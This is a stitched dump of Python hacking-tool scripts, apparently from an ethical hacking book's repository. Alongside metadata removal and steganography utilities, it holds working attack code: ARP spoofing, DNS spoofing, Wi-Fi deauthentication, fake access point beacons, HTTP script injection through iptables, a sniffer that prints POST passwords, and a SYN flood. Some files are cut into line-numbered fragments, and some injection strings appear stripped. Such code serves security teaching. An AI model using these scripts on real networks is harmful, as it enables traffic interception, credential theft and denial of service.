    parser.add_argument("-r", "--random", action="store_true", help="Whether to generate a random MAC address")
    parser.add_argument("-m", "--mac", help="The new MAC you want to change to")
    args = parser.parse_args()
    if args.random:
        # if random parameter is set, generate a random MAC
        new_mac_address = get_random_mac_address()
    elif args.mac:
        # if mac is set, use it after cleaning
        new_mac_address = clean_mac(args.mac)
    else:
        # the original fell through with new_mac_address unbound (NameError)
        parser.error("either -r/--random or -m/--mac must be specified")

    connected_adapters_mac = get_connected_adapters_mac_address()
    old_mac_address, target_transport_name = get_user_adapter_choice(connected_adapters_mac)
    print("[*] Old MAC address:", old_mac_address)
    adapter_index = change_mac_address(target_transport_name, new_mac_address)
    if adapter_index is None:
        print("[-] Could not find the adapter in the registry, quitting...")
        exit()
    print("[+] Changed to:", new_mac_address)
    disable_adapter(adapter_index)
    print("[+] Adapter is disabled")
    enable_adapter(adapter_index)
    print("[+] Adapter is enabled again")
from docx import Document
from datetime import datetime

def remove_docx_metadata(docx_file, output_file):
    """Removes metadata from a docx file.

    Args:
        docx_file (str): The path to the input docx file.
        output_file (str): The path to save the cleaned docx file.

    Returns:
        None
    """
    # Open the document
    doc = Document(docx_file)
    # Get the core properties
    core_props = doc.core_properties
    # Blank out all textual metadata fields.
    # NOTE: the original also set `core_props.creator`, but python-docx
    # exposes no `creator` core property, so that assignment silently
    # created a plain attribute with no effect on the saved file.
    core_props.author = ""
    core_props.title = ""
    core_props.subject = ""
    core_props.keywords = ""
    core_props.comments = ""
    core_props.description = ""
    core_props.last_modified_by = ""
    # Reset revision to 1
    core_props.revision = 1
    # Remove language and version information
    core_props.language = ""
    core_props.version = ""
    # Set modified and created dates to a dummy date (the Unix epoch)
    core_props.modified = core_props.created = datetime(1970, 1, 1)
    # Save the cleaned document
    doc.save(output_file)

# Example usage: Remove metadata from 'example.docx' and save as 'cleaned_example.docx'
remove_docx_metadata('files/example.docx', 'files/cleaned_example.docx')
10 | 11 | Returns: 12 | None 13 | """ 14 | with Image.open(image_file) as img: 15 | # Get the image data 16 | data = img.getdata() 17 | 18 | # Create a new image without the EXIF data 19 | image_without_exif = Image.new(img.mode, img.size) 20 | image_without_exif.putdata(data) 21 | 22 | # Save the new image to the output file 23 | image_without_exif.save(output_file) 24 | 25 | # Example usage 26 | remove_image_metadata('files/image.jpg', 'files/cleaned_image.jpg') 27 | -------------------------------------------------------------------------------- /chapter-4/remove-metadata/remove_metadata_from_media.py: -------------------------------------------------------------------------------- 1 | import ffmpeg 2 | 3 | def remove_media_metadata(media_file, output_file): 4 | """ 5 | Removes the metadata from a media file and saves it to a new file. 6 | 7 | Args: 8 | media_file (str): The path to the input media file. 9 | output_file (str): The path to the output media file where the cleaned version will be saved. 10 | 11 | Returns: 12 | None 13 | """ 14 | ( 15 | ffmpeg 16 | .input(media_file) 17 | .output(output_file, map_metadata=-1) 18 | .run() 19 | ) 20 | 21 | # Example usage 22 | # This code removes the metadata from the 'example.mp3' file 23 | # and saves the cleaned version to 'cleaned_example.mp3' 24 | remove_media_metadata('files/example.mp3', 'files/cleaned_example.mp3') 25 | -------------------------------------------------------------------------------- /chapter-4/remove-metadata/remove_metadata_from_pdf.py: -------------------------------------------------------------------------------- 1 | import pikepdf 2 | 3 | def remove_pdf_metadata(pdf_file, output_file): 4 | """ 5 | Removes all metadata from a PDF file. 6 | 7 | Args: 8 | pdf_file (str): The path to the input PDF file. 9 | output_file (str): The path to the output PDF file with metadata removed. 
import cv2
import numpy as np
import os

def to_bin(data):
    """Convert `data` to binary format as a string (or list of strings for arrays)."""
    if isinstance(data, str):
        return ''.join([format(ord(i), "08b") for i in data])
    elif isinstance(data, bytes):
        return ''.join([format(i, "08b") for i in data])
    elif isinstance(data, np.ndarray):
        return [format(i, "08b") for i in data]
    elif isinstance(data, int) or isinstance(data, np.uint8):
        return format(data, "08b")
    else:
        raise TypeError("Type not supported.")


def encode(image_name, secret_data, n_bits=2):
    """Hide `secret_data` (str or bytes) in the `n_bits` least significant
    bits of each colour channel of the image and return the modified array."""
    # read the image
    image = cv2.imread(image_name)
    # maximum bytes to encode
    n_bytes = image.shape[0] * image.shape[1] * 3 * n_bits // 8
    print("[*] Maximum bytes to encode:", n_bytes)
    print("[*] Data size:", len(secret_data))
    if len(secret_data) > n_bytes:
        raise ValueError(f"[!] Insufficient bytes ({len(secret_data)}), need bigger image or less data.")
    print("[*] Encoding data...")
    # add stopping criteria so decode() knows where the payload ends
    if isinstance(secret_data, str):
        secret_data += "====="
    elif isinstance(secret_data, bytes):
        secret_data += b"====="
    data_index = 0
    # convert data to binary
    binary_secret_data = to_bin(secret_data)
    # size of data to hide
    data_len = len(binary_secret_data)
    # fill the 1st least significant bit of every pixel first, then the 2nd, ...
    for bit in range(1, n_bits + 1):
        for row in image:
            for pixel in row:
                # convert RGB values to binary format
                r, g, b = to_bin(pixel)
                # modify the least significant bit only if there is still data to store
                if data_index < data_len:
                    if bit == 1:
                        # least significant red pixel bit
                        pixel[0] = int(r[:-bit] + binary_secret_data[data_index], 2)
                    elif bit > 1:
                        # replace the `bit` least significant bit of the red pixel with the data bit
                        pixel[0] = int(r[:-bit] + binary_secret_data[data_index] + r[-bit+1:], 2)
                    data_index += 1
                if data_index < data_len:
                    if bit == 1:
                        # least significant green pixel bit
                        pixel[1] = int(g[:-bit] + binary_secret_data[data_index], 2)
                    elif bit > 1:
                        # replace the `bit` least significant bit of the green pixel with the data bit
                        pixel[1] = int(g[:-bit] + binary_secret_data[data_index] + g[-bit+1:], 2)
                    data_index += 1
                if data_index < data_len:
                    if bit == 1:
                        # least significant blue pixel bit
                        pixel[2] = int(b[:-bit] + binary_secret_data[data_index], 2)
                    elif bit > 1:
                        # replace the `bit` least significant bit of the blue pixel with the data bit
                        pixel[2] = int(b[:-bit] + binary_secret_data[data_index] + b[-bit+1:], 2)
                    data_index += 1
                # if data is encoded, just break out of the loop
                if data_index >= data_len:
                    break
    return image


def decode(image_name, n_bits=1, in_bytes=False):
    """Recover data hidden by encode(); `n_bits` must match the value used when encoding."""
    print("[+] Decoding...")
    # read the image
    image = cv2.imread(image_name)
    binary_data = ""
    for bit in range(1, n_bits + 1):
        for row in image:
            for pixel in row:
                r, g, b = to_bin(pixel)
                binary_data += r[-bit]
                binary_data += g[-bit]
                binary_data += b[-bit]
    # split by 8-bits
    all_bytes = [binary_data[i: i+8] for i in range(0, len(binary_data), 8)]
    # convert from bits to characters
    if in_bytes:
        # if the data we'll decode is binary data,
        # we initialize bytearray instead of string
        decoded_data = bytearray()
        for byte in all_bytes:
            # append the data after converting from binary
            decoded_data.append(int(byte, 2))
            if decoded_data[-5:] == b"=====":
                # exit out of the loop if we find the stopping criteria
                break
    else:
        decoded_data = ""
        for byte in all_bytes:
            decoded_data += chr(int(byte, 2))
            if decoded_data[-5:] == "=====":
                break
    # strip the "=====" terminator
    return decoded_data[:-5]


if __name__ == "__main__":
    import argparse
    parser = argparse.ArgumentParser(description="Steganography encoder/decoder, this Python scripts encode data within images.")
    parser.add_argument("-t", "--text", help="The text data to encode into the image, this only should be specified for encoding")
    parser.add_argument("-f", "--file", help="The file to hide into the image, this only should be specified while encoding")
    parser.add_argument("-e", "--encode", help="Encode the following image")
    parser.add_argument("-d", "--decode", help="Decode the following image")
    parser.add_argument("-b", "--n-bits", help="The number of least significant bits of the image to encode", type=int, default=2)

    args = parser.parse_args()
    if args.encode:
        # if the encode argument is specified
        if args.text:
            secret_data = args.text
        elif args.file:
            with open(args.file, "rb") as f:
                secret_data = f.read()
        else:
            # the original fell through with secret_data unbound (NameError)
            parser.error("encoding requires either -t/--text or -f/--file")
        input_image = args.encode
        # split the absolute path and the file
        path, file = os.path.split(input_image)
        # splitext handles filenames containing dots correctly
        # (the original split(".") broke on e.g. "my.photo.png");
        # the output name is derived from the input filename
        filename, ext = os.path.splitext(file)
        output_image = os.path.join(path, f"{filename}_encoded{ext}")
        # encode the data into the image
        encoded_image = encode(image_name=input_image, secret_data=secret_data, n_bits=args.n_bits)
        # save the output image (encoded image)
        cv2.imwrite(output_image, encoded_image)
        print("[+] Saved encoded image.")
    if args.decode:
        input_image = args.decode
        if args.file:
            # decode the secret data from the image and write it to file
            decoded_data = decode(input_image, n_bits=args.n_bits, in_bytes=True)
            with open(args.file, "wb") as f:
                f.write(decoded_data)
            print(f"[+] File decoded, {args.file} is saved successfully.")
        else:
            # decode the secret data from the image and print it in the console
            decoded_data = decode(input_image, n_bits=args.n_bits)
            print("[+] Decoded data:", decoded_data)
def _enable_linux_iproute():
    """Enables IP route (IP Forward) in linux-based distro.

    Reads /proc/sys/net/ipv4/ip_forward first and returns early when
    forwarding is already on, otherwise writes "1" to enable it.
    """
    file_path = "/proc/sys/net/ipv4/ip_forward"
    with open(file_path) as f:
        # BUG FIX: f.read() returns a string (e.g. "1\n"); the original
        # compared it to the integer 1, which is always False, so the
        # early-return branch could never trigger.
        if f.read().strip() == "1":
            # already enabled
            return
    with open(file_path, "w") as f:
        print(1, file=f)
def spoof(target_ip, host_ip, verbose=True):
    """Spoofs `target_ip` saying that we are `host_ip`.

    Accomplished by poisoning the target's ARP cache with an unsolicited
    ARP "is-at" reply. We don't set 'hwsrc' (source MAC) because scapy
    fills it with our real MAC address by default, which is what we want.

    :param target_ip: victim IP whose ARP cache gets poisoned.
    :param host_ip: IP address we are impersonating (usually the gateway).
    :param verbose: print a message for each packet sent.
    """
    # get the mac address of the target
    target_mac = get_mac(target_ip)
    if target_mac is None:
        # BUG FIX: get_mac() returns None when the target doesn't answer;
        # crafting an ARP packet with hwdst=None would misbehave, so skip.
        if verbose:
            print(f"[!] Could not resolve MAC address for {target_ip}, skipping.")
        return
    # craft the arp 'is-at' operation packet, in other words; an ARP response
    arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, op='is-at')
    # verbose = 0 means that we send the packet without printing anything
    send(arp_response, verbose=0)
    if verbose:
        # get the MAC address of the default interface we are using
        self_mac = ARP().hwsrc
        print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, self_mac))
def arpspoof(target, host, verbose=True):
    """Run a bidirectional ARP spoof attack until interrupted with CTRL+C.

    Poisons both the target's and the host's ARP caches once per second,
    then restores both on KeyboardInterrupt.
    """
    # IP forwarding must be on so the victim keeps its connectivity
    enable_ip_route()
    try:
        while True:
            # poison both directions of the conversation
            for poisoned, impersonated in ((target, host), (host, target)):
                spoof(poisoned, impersonated, verbose)
            # wait a second before the next round of replies
            time.sleep(1)
    except KeyboardInterrupt:
        print("[!] Detected CTRL+C ! restoring the network, please wait...")
        # undo the poisoning in both directions
        restore(target, host)
        restore(host, target)
class WService:
    """Thin wrapper around win32serviceutil to start/stop/restart a Windows
    service, optionally on a remote machine.

    :param service: the Windows service name (e.g. "RemoteAccess").
    :param machine: target machine name, or None for the local machine.
    :param verbose: print status messages for each operation.
    """

    def __init__(self, service, machine=None, verbose=False):
        self.service = service
        self.machine = machine
        self.verbose = verbose

    @property
    def running(self):
        # status index 1 holds the current state; 4 == SERVICE_RUNNING
        return win32serviceutil.QueryServiceStatus(self.service)[1] == 4

    def start(self):
        """Start the service.

        Returns True on success, False on failure, None if it was
        already running.
        """
        if not self.running:
            win32serviceutil.StartService(self.service)
            # give the service manager a moment before re-checking
            time.sleep(1)
            # check if service is running
            if self.running:
                # service is running
                if self.verbose:
                    print(f"[+] {self.service} started successfully.")
                return True
            else:
                # service is not running
                if self.verbose:
                    print(f"[-] Cannot start {self.service}")
                return False
        elif self.verbose:
            print(f"[!] {self.service} is already running.")

    def stop(self):
        """Stop the service.

        Returns True on success, False on failure, None if it was
        not running.
        """
        if self.running:
            win32serviceutil.StopService(self.service)
            time.sleep(0.5)
            if not self.running:
                if self.verbose:
                    print(f"[+] {self.service} stopped successfully.")
                return True
            else:
                if self.verbose:
                    print(f"[-] Cannot stop {self.service}")
                return False
        elif self.verbose:
            print(f"[!] {self.service} is not running.")

    def restart(self):
        """Restart the service.

        Returns True on success, False on failure, None if it was
        not running.
        """
        if self.running:
            win32serviceutil.RestartService(self.service)
            time.sleep(2)
            if self.running:
                if self.verbose:
                    print(f"[+] {self.service} restarted successfully.")
                return True
            else:
                if self.verbose:
                    # BUG FIX: the failure message said "Cannot start"
                    # (copy-pasted from start()); this is a restart failure
                    print(f"[-] Cannot restart {self.service}")
                return False
        elif self.verbose:
            print(f"[!] {self.service} is not running.")
def print_packet(packet):
    """Print MAC, hostname, vendor ID and requested IP of a sniffed DHCP request.

    Only prints when all four fields were found in the packet.
    """
    # initialize these variables to None at first
    target_mac, requested_ip, hostname, vendor_id = [None] * 4
    # get the MAC address of the requester
    if packet.haslayer(Ether):
        target_mac = packet.getlayer(Ether).src
    # BUG FIX: the sniff filter matches *any* UDP 67/68 traffic, so a
    # non-DHCP packet would raise IndexError on packet[DHCP]; guard first.
    if not packet.haslayer(DHCP):
        return
    # get the DHCP options
    dhcp_options = packet[DHCP].options
    for item in dhcp_options:
        try:
            label, value = item
        except ValueError:
            # options such as "end"/"pad" are plain strings, not pairs
            continue
        if label == 'requested_addr':
            # get the requested IP
            requested_ip = value
        elif label == 'hostname':
            # get the hostname of the device
            hostname = value.decode()
        elif label == 'vendor_class_id':
            # get the vendor ID
            vendor_id = value.decode()
    if target_mac and vendor_id and hostname and requested_ip:
        # if all variables are not None, print the device details
        time_now = time.strftime("[%Y-%m-%d - %H:%M:%S]")
        print(f"{time_now} : {target_mac} - {hostname} / {vendor_id} requested {requested_ip}")
def deauth(target_mac, gateway_mac, inter=0.1, count=None, loop=1, iface="wlan0mon", verbose=1):
    """Send 802.11 deauthentication frames to `target_mac`, spoofed as the AP.

    :param target_mac: MAC address of the victim (802.11 addr1, destination).
    :param gateway_mac: MAC of the access point (addr2/addr3, spoofed sender).
    :param inter: seconds between two consecutive frames.
    :param count: number of frames to send; None with loop=1 means infinite.
    :param loop: 1 to loop forever, 0 to send `count` frames once.
    :param iface: monitor-mode interface to transmit on.
    :param verbose: scapy sendp verbosity.
    """
    # 802.11 frame
    # addr1: destination MAC
    # addr2: source MAC
    # addr3: Access Point MAC
    dot11 = Dot11(addr1=target_mac, addr2=gateway_mac, addr3=gateway_mac)
    # stack them up; reason 7 = "Class 3 frame received from nonassociated STA"
    packet = RadioTap()/dot11/Dot11Deauth(reason=7)
    # send the packet
    sendp(packet, inter=inter, count=count, loop=loop, iface=iface, verbose=verbose)


if __name__ == "__main__":
    import argparse
    parser = argparse.ArgumentParser(description="A python script for sending deauthentication frames")
    parser.add_argument("target", help="Target MAC address to deauthenticate.")
    parser.add_argument("gateway", help="Gateway MAC address that target is authenticated with")
    # IMPROVEMENT: type=int / type=float let argparse validate the values
    # instead of crashing later in the manual int()/float() casts
    parser.add_argument("-c", "--count", type=int, default=0,
                        help="number of deauthentication frames to send, specify 0 to keep sending infinitely, default is 0")
    parser.add_argument("--interval", type=float, default=0.1,
                        help="The sending frequency between two frames sent, default is 100ms")
    parser.add_argument("-i", dest="iface", default="wlan0mon",
                        help="Interface to use, must be in monitor mode, default is 'wlan0mon'")
    # typo fix in the help text: "wether" -> "whether"
    parser.add_argument("-v", "--verbose", help="whether to print messages", action="store_true")
    # parse the arguments
    args = parser.parse_args()
    target = args.target
    gateway = args.gateway
    count = args.count
    interval = args.interval
    iface = args.iface
    verbose = args.verbose

    if count == 0:
        # if count is 0, it means we loop forever (until interrupt)
        loop = 1
        count = None
    else:
        loop = 0

    # printing some info messages
    if verbose:
        if count:
            print(f"[+] Sending {count} frames every {interval}s...")
        else:
            print(f"[+] Sending frames every {interval}s for ever...")

    # send the deauthentication frames
    deauth(target, gateway, interval, count, loop, iface, verbose)
# a function to check whether two domains are the same regardless of www.
def is_same_domain(domain1, domain2):
    """Checks whether two domains are the same regardless of a leading www.

    For instance, `www.google.com` and `google.com` are the same domain.

    :return: True if the domains match after removing a leading "www." prefix.
    """
    # BUG FIX: str.replace("www.", "") removed "www." appearing *anywhere*
    # in the name (e.g. "sub.www.example.com"); only strip a leading prefix.
    if domain1.startswith("www."):
        domain1 = domain1[4:]
    if domain2.startswith("www."):
        domain2 = domain2[4:]
    # return the result
    return domain1 == domain2
# a function to get the modified IP of domains in dns_hosts dictionary
def get_modified_ip(qname, dns_hosts=dns_hosts):
    """Look up `qname` in the `dns_hosts` mapping, ignoring any "www." prefix.

    Returns the spoofed IP address of the first matching domain, or None
    when `qname` is not one of the domains we spoof.
    """
    # scan our records; the first matching domain wins
    return next(
        (ip for domain, ip in dns_hosts.items() if is_same_domain(qname, domain)),
        None,
    )
def modify_packet(packet):
    """Modifies the DNS Resource Record `packet` (the answer part) to map our
    globally defined `dns_hosts` dictionary.

    For instance, whenever we see a google.com answer, this function replaces
    the real IP address with our fake IP address. Length and checksum fields
    are deleted so scapy recalculates them for the modified packet.
    """
    # get the DNS question name, the domain name (bytes with a trailing dot)
    qname = packet[DNSQR].qname
    # BUG FIX: strip(".") also removed *leading* dots; only the trailing
    # root dot should be removed, so use rstrip
    qname = qname.decode().rstrip(".")
    # get the modified IP if it exists
    modified_ip = get_modified_ip(qname)
    if not modified_ip:
        # if the website isn't in our record
        # we don't wanna modify that
        print("no modification:", qname)
        return packet
    # print the original IP address
    print(f"{GREEN}[+] Domain: {qname}{RESET}")
    print(f"{GREEN}[+] Original IP: {packet[DNSRR].rdata}{RESET}")
    # typo fix in the output message: "Modifed" -> "Modified"
    print(f"{GREEN}[+] Modified (New) IP: {modified_ip}{RESET}")
    # craft new answer, overriding the original,
    # setting the rdata to the IP we want to redirect to (spoofed)
    packet[DNS].an = DNSRR(rrname=packet[DNSQR].qname, rdata=modified_ip)
    # set the answer count to 1
    packet[DNS].ancount = 1
    # delete checksums and length of packet, because we have modified it;
    # new calculations are required (scapy will do them automatically)
    del packet[IP].len
    del packet[IP].chksum
    del packet[UDP].len
    del packet[UDP].chksum
    # return the modified packet
    return packet
def send_beacon(ssid, mac, infinite=True):
    """Broadcast 802.11 beacon frames advertising a fake AP named `ssid`.

    Transmits on the module-level `iface` (set in __main__), which must be
    a monitor-mode interface.

    :param ssid: network name to advertise.
    :param mac: forged sender / AP MAC address.
    :param infinite: if True, keep sending one frame every 100 ms forever.
    """
    # management frame (type=0), beacon subtype (8); broadcast receiver,
    # both sender and AP fields set to the forged MAC
    dot11 = Dot11(type=0, subtype=8, addr1="ff:ff:ff:ff:ff:ff", addr2=mac, addr3=mac)
    # the beacon layer itself
    beacon = Dot11Beacon()
    # information element carrying the network name
    essid = Dot11Elt(ID="SSID", info=ssid, len=len(ssid))
    # assemble the full frame under a RadioTap header
    frame = RadioTap()/dot11/beacon/essid
    # transmit: either forever at 100 ms intervals, or a single frame
    if infinite:
        sendp(frame, inter=0.1, loop=1, iface=iface, verbose=0)
    else:
        sendp(frame, iface=iface, verbose=0)
# Flat script: forge a single fake access point named "Test" by broadcasting
# 802.11 beacon frames forever on a monitor-mode interface.

# interface to use to send beacon frames, must be in monitor mode
iface = "wlan0mon"
# generate a random MAC address (built-in in scapy)
sender_mac = RandMAC()
# SSID (name of access point)
ssid = "Test"
# 802.11 management frame (type=0), beacon subtype (8);
# addr1 is the broadcast receiver, addr2/addr3 are the forged sender/AP MAC
dot11 = Dot11(type=0, subtype=8, addr1="ff:ff:ff:ff:ff:ff", addr2=sender_mac, addr3=sender_mac)
# beacon layer
beacon = Dot11Beacon()
# putting ssid in the frame (SSID information element)
essid = Dot11Elt(ID="SSID", info=ssid, len=len(ssid))
# stack all the layers and add a RadioTap header
frame = RadioTap()/dot11/beacon/essid
# send the frame at layer 2 every 100 milliseconds forever
# using the `iface` interface
sendp(frame, inter=0.1, iface=iface, loop=1)
from scapy.all import *
from colorama import init, Fore
import netfilterqueue
import re

# initialize colorama
init()
# define colors
GREEN = Fore.GREEN
RESET = Fore.RESET


def process_packet(packet):
    """Netfilterqueue callback run for every packet redirected to the queue.

    For HTTP requests (dport 80): strips the Accept-Encoding header so the
    server replies with uncompressed HTML. For HTTP responses (sport 80):
    injects `added_text` just before the closing body tag and fixes the
    Content-Length header accordingly. Every packet is re-accepted at the
    end so traffic keeps flowing.
    """
    # convert the netfilterqueue packet into Scapy packet
    spacket = IP(packet.get_payload())
    if spacket.haslayer(Raw) and spacket.haslayer(TCP):
        if spacket[TCP].dport == 80:
            # HTTP request
            print(f"[*] Detected HTTP Request from {spacket[IP].src} to {spacket[IP].dst}")
            try:
                load = spacket[Raw].load.decode()
            except Exception as e:
                # raw data cannot be decoded, apparently not HTML;
                # forward the packet and exit the function
                packet.accept()
                return
            # remove Accept-Encoding header from the HTTP request so the
            # response comes back as plain (non-gzipped) HTML we can edit
            new_load = re.sub(r"Accept-Encoding:.*\r\n", "", load)
            # set the new data
            spacket[Raw].load = new_load
            # set IP length header, checksums of IP and TCP to None
            # so Scapy will re-calculate them automatically
            spacket[IP].len = None
            spacket[IP].chksum = None
            spacket[TCP].chksum = None
            # set the modified Scapy packet back to the netfilterqueue packet
            packet.set_payload(bytes(spacket))
        if spacket[TCP].sport == 80:
            # HTTP response
            print(f"[*] Detected HTTP Response from {spacket[IP].src} to {spacket[IP].dst}")
            try:
                load = spacket[Raw].load.decode()
            except Exception as e:
                print(e)
                packet.accept()
                return
            # if you want to debug and see the HTML data
            # print("Load:", load)
            # Javascript code to add, feel free to add any Javascript code
            # NOTE(review): the payload string below appears to have had its
            # HTML/script tags stripped during extraction — confirm against
            # the original file before relying on the injection doing anything
            added_text = ""
            # or you can add HTML as well!
            # added_text = "HTML Injected successfully!"
            # calculate the length in bytes, each character corresponds to a byte
            added_text_length = len(added_text)
            # replace the closing tag with the added text plus the closing tag
            # NOTE(review): the search/replace tags also appear stripped here —
            # presumably this targeted the closing body tag; verify upstream
            load = load.replace("", added_text + "")
            if "Content-Length" in load:
                # if Content-Length header is available
                # get the old Content-Length value
                content_length = int(re.search(r"Content-Length: (\d+)\r\n", load).group(1))
                # re-calculate the content length by adding the length of the injected code
                new_content_length = content_length + added_text_length
                # replace the new content length in the header
                load = re.sub(r"Content-Length:.*\r\n", f"Content-Length: {new_content_length}\r\n", load)
            # print a message if injected
            if added_text in load:
                print(f"{GREEN}[+] Successfully injected code to {spacket[IP].dst}{RESET}")
            # if you want to debug and see the modified HTML data
            # print("Load:", load)
            # set the new data
            spacket[Raw].load = load
            # set IP length header, checksums of IP and TCP to None
            # so Scapy will re-calculate them automatically
            spacket[IP].len = None
            spacket[IP].chksum = None
            spacket[TCP].chksum = None
            # set the modified Scapy packet back to the netfilterqueue packet
            packet.set_payload(bytes(spacket))
    # accept all the packets
    packet.accept()


if __name__ == "__main__":
    QUEUE_NUM = 0
    # insert the iptables FORWARD rule so forwarded traffic enters our queue
    # NOTE(review): `os` is not imported explicitly in this file; presumably
    # it leaks in via `from scapy.all import *` — confirm, or add `import os`
    os.system(f"iptables -I FORWARD -j NFQUEUE --queue-num {QUEUE_NUM}")
    # initialize the queue
    queue = netfilterqueue.NetfilterQueue()
    try:
        # bind the queue number 0 to the process_packet() function
        queue.bind(0, process_packet)
        # start the filter queue
        queue.run()
    except KeyboardInterrupt:
        # remove the iptables FORWARD rule, restoring normal forwarding
        os.system(f"iptables --flush")
        print("[-] Detected CTRL+C, exiting...")
        exit(0)
from scapy.all import ARP, Ether, srp

# the network range to ARP-scan (the gateway's /24 subnet)
target_ip = "192.168.1.1/24"
# ARP who-has request covering every address in the range
arp = ARP(pdst=target_ip)
# Ethernet broadcast frame; ff:ff:ff:ff:ff:ff reaches every host on the LAN
ether = Ether(dst="ff:ff:ff:ff:ff:ff")
# stack the layers
packet = ether/arp

# srp() sends and receives packets at layer 2; keep only the answered probes
result = srp(packet, timeout=3, verbose=0)[0]

# one {ip, mac} record per responding host
clients = [{'ip': received.psrc, 'mac': received.hwsrc} for _, received in result]

# print the discovered clients as a small table
print("Available devices in the network:")
print("IP" + " "*18+"MAC")
for client in clients:
    print("{:16} {}".format(client['ip'], client['mac']))
def process_packet(packet):
    """Sniffing callback: print the URL, source IP and method of every HTTP
    request, plus raw POST data when the global `show_raw` flag is set."""
    if not packet.haslayer(HTTPRequest):
        # not an HTTP request, nothing to report
        return
    # requested URL = Host header + path
    url = packet[HTTPRequest].Host.decode() + packet[HTTPRequest].Path.decode()
    # the requester's IP address
    ip = packet[IP].src
    # the HTTP method (GET, POST, ...)
    method = packet[HTTPRequest].Method.decode()
    print(f"\n{GREEN}[+] {ip} Requested {url} with {method}{RESET}")
    # POST bodies often carry credentials, search queries, etc.
    if show_raw and packet.haslayer(Raw) and method == "POST":
        print(f"\n{RED}[*] Some useful Raw data: {packet[Raw].load}{RESET}")
\ 45 | + "It is suggested that you run arp spoof before you use this script, otherwise it'll sniff your local browsing packets") 46 | parser.add_argument("-i", "--iface", help="Interface to use, default is scapy's default interface") 47 | parser.add_argument("--show-raw", dest="show_raw", action="store_true", help="Whether to print POST raw data, such as passwords, search queries, etc.") 48 | # parse arguments 49 | args = parser.parse_args() 50 | iface = args.iface 51 | show_raw = args.show_raw 52 | # start sniffing 53 | sniff_packets(iface) -------------------------------------------------------------------------------- /chapter-5/syn-flood/output.md: -------------------------------------------------------------------------------- 1 | python syn_flood.py 192.168.1.1 -p 80 -------------------------------------------------------------------------------- /chapter-5/syn-flood/requirements.txt: -------------------------------------------------------------------------------- 1 | scapy -------------------------------------------------------------------------------- /chapter-5/syn-flood/syn_flood.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | import argparse 3 | 4 | # create an ArgumentParser object 5 | parser = argparse.ArgumentParser(description="Simple SYN Flood Script") 6 | parser.add_argument("target_ip", help="Target IP address (e.g router's IP)") 7 | parser.add_argument("-p", "--port", type=int, help="Destination port (the port of the target's machine service, \ 8 | e.g 80 for HTTP, 22 for SSH and so on).") 9 | # parse arguments from the command line 10 | args = parser.parse_args() 11 | # target IP address (should be a testing router/firewall) 12 | target_ip = args.target_ip 13 | # the target port u want to flood 14 | target_port = args.port 15 | # forge IP packet with target ip as the destination IP address 16 | ip = IP(dst=target_ip) 17 | # or if you want to perform IP Spoofing (will work as 
well) 18 | # ip = IP(src=RandIP("192.168.1.1/24"), dst=target_ip) 19 | # forge a TCP SYN packet with a random source port 20 | # and the target port as the destination port 21 | tcp = TCP(sport=RandShort(), dport=target_port, flags="S") 22 | # add some flooding data (1KB in this case, don't increase it too much, 23 | # otherwise, it won't work.) 24 | raw = Raw(b"X"*1024) 25 | # stack up the layers 26 | p = ip / tcp / raw 27 | # send the constructed packet in a loop until CTRL+C is detected 28 | send(p, loop=1, verbose=0) -------------------------------------------------------------------------------- /chapter-5/wifi-scanner/output.md: -------------------------------------------------------------------------------- 1 | pip3 install pandas scapy 2 | 3 | sudo ifconfig wlan0 down 4 | sudo iwconfig wlan0 mode monitor 5 | 6 | iwconfig wlan0mon channel 2 7 | 8 | python wifi_scanner.py wlan0mon -------------------------------------------------------------------------------- /chapter-5/wifi-scanner/requirements.txt: -------------------------------------------------------------------------------- 1 | pandas 2 | scapy -------------------------------------------------------------------------------- /chapter-5/wifi-scanner/wifi_scanner.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | from threading import Thread 3 | import pandas 4 | import time 5 | import os 6 | import sys 7 | 8 | 9 | # initialize the networks dataframe that will contain all access points nearby 10 | networks = pandas.DataFrame(columns=["BSSID", "SSID", "dBm_Signal", "Channel", "Crypto"]) 11 | # set the index BSSID (MAC address of the AP) 12 | networks.set_index("BSSID", inplace=True) 13 | 14 | def callback(packet): 15 | if packet.haslayer(Dot11Beacon): 16 | # extract the MAC address of the network 17 | bssid = packet[Dot11].addr2 18 | # get the name of it 19 | ssid = packet[Dot11Elt].info.decode() 20 | try: 21 | dbm_signal = 
packet.dBm_AntSignal 22 | except: 23 | dbm_signal = "N/A" 24 | # extract network stats 25 | stats = packet[Dot11Beacon].network_stats() 26 | # get the channel of the AP 27 | channel = stats.get("channel") 28 | # get the crypto 29 | crypto = stats.get("crypto") 30 | # add the network to our dataframe 31 | networks.loc[bssid] = (ssid, dbm_signal, channel, crypto) 32 | 33 | 34 | def print_all(): 35 | # print all the networks and clear the console every 0.5s 36 | while True: 37 | os.system("clear") 38 | print(networks) 39 | time.sleep(0.5) 40 | 41 | 42 | def change_channel(): 43 | ch = 1 44 | while True: 45 | # change the channel of the interface 46 | os.system(f"iwconfig {interface} channel {ch}") 47 | # switch channel from 1 to 14 each 0.5s 48 | ch = ch % 14 + 1 49 | time.sleep(0.5) 50 | 51 | 52 | if __name__ == "__main__": 53 | # interface name, check using iwconfig 54 | interface = sys.argv[1] 55 | # start the thread that prints all the networks 56 | printer = Thread(target=print_all) 57 | printer.daemon = True 58 | printer.start() 59 | # start the channel changer 60 | channel_changer = Thread(target=change_channel) 61 | channel_changer.daemon = True 62 | channel_changer.start() 63 | # start sniffing 64 | sniff(prn=callback, iface=interface) -------------------------------------------------------------------------------- /chapter-6/email-spider/Screenshot.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/x4nth055/ethical-hacking-tools-python/5183698f8f19524cd729ed763c9a78e65a6d8f53/chapter-6/email-spider/Screenshot.jpg -------------------------------------------------------------------------------- /chapter-6/email-spider/advanced_email_spider.py: -------------------------------------------------------------------------------- 1 | import re 2 | import argparse 3 | import threading 4 | from urllib.parse import urlparse, urljoin 5 | from queue import Queue 6 | import time 7 | import warnings 8 | 
